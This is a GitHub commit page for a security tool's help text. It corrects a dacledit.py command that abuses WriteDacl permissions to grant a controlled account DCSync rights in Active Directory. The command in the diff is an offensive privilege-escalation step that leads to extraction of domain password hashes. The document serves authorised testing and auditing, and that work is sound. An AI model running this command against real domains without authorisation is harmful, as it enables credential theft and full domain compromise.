Skip to content

Commit

Permalink
Merge pull request #687 from ShutdownRepo/patch-1
Browse files Browse the repository at this point in the history
Fixing LinuxAbuse.jsx dacledit.py DCSync command
  • Loading branch information
andyrobbins authored Jul 26, 2023
2 parents b60f0db + e4e5e98 commit 14b4ef2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
Original file line number Diff line number Diff line change
Expand Up @@ -387,7 +387,7 @@ const LinuxAbuse = ({
<pre>
<code>
{
"dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
"dacledit.py -action 'write' -rights 'DCSync' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
}
</code>
</pre>
Expand Down

0 comments on commit 14b4ef2

Please sign in to comment.